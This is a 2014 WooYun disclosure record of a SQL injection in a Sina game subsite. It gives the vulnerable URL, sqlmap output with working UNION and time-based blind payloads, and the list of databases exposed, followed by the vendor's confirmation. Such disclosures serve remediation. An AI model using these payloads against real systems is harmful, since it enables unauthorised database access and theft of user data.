当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070020

漏洞标题:新浪分站SQL注射

相关厂商:新浪

漏洞作者: niliu

提交时间:2014-07-28 16:04

修复时间:2014-09-11 16:06

公开时间:2014-09-11 16:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-28: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-11: 细节向公众公开

简要描述:

SQL注射

详细说明:

http://wanwan.sina.com.cn/smallgame/game_top.php?gid=202205&top=10&type=day


gid参数
sqlmap测试

---
Place: GET
Parameter: gid
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: gid=202205 UNION ALL SELECT NULL,NULL,CONCAT(0x7171726e71,0x5957644
a694c6d514d45,0x7163687871),NULL#&top=10&type=day
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: gid=202205 AND SLEEP(5)-- Fsja&top=10&type=day
---


web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] information_schema
[*] test
[*] wanwangames
[*] wanwanpay


1.jpg


漏洞证明:

2.jpg

修复方案:

过滤参数。

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-07-28 16:58

厂商回复:

该漏洞我们已经通过其他渠道获知,已经通知开发人员进行修复,感谢对新浪安全的支持。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-07-28 16:09 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    嘿嘿 前排

  2. 2014-07-28 16:12 | 川川 ( 实习白帽子 | Rank:68 漏洞数:28 | 今天我刷屏)

    .......

  3. 2014-07-28 17:21 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @川川 川神?